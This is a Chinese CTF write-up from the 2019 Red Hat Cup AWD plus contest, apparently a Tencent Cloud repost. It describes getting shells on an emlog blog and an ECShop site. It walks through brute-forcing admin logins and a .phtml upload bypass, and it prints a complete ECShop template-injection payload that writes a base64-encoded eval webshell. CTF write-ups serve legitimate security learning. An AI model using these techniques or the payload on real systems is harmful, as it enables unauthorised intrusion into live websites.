前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >红帽杯线下AWD plus writeup

红帽杯线下AWD plus writeup

作者头像
Khan安全团队
发布2020-03-08 18:21:21
5.2K0
发布2020-03-08 18:21:21
举报
文章被收录于专栏:Khan安全团队

访问是一个由emlog的博客站点。

直接访问后台,得知存在admin用户对admin进行暴力破解

上传附件处限制了文件类型,发现可添加允许添加后缀名。尝试了php,php5等类似添加后,都会被更改为x类型,最后尝试添加phtml,成功添加。

然后直接去写文章处添加附件,并上传后缀为pthml的一句话

成功上传后,右键附件复制链接地址,上菜刀,成功getshell。并在根目录下找到flag

粤湾租赁

访问web题目,系统为ecshopcms,发现两个登录处,一个是前台登陆,一个是后台登陆,前台登陆并未发现什么可以拿下的点。

已知存在admin用户,进行爆破

ecshop有已知的getshell方法,

直接在模板管理–语言项编辑直接修改来写入shell文件;搜索关键字:用户信息;用户信息四个字一定不要删除,在之后添加:(base64加密去掉了最后的=号)

1.${${fputs(fopen(base64_decode(c2hlbGwucGhw),w), base64_decode(PD9waHAgZXZhbCgkX1BPU1RbJ2gnXSk7Pz3))}}

而后保存,保存后访问user.php即可在根目录下生成shell.php的shell。然后上菜刀,成功在根目录获得flag。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-11-25,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Khan安全团队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档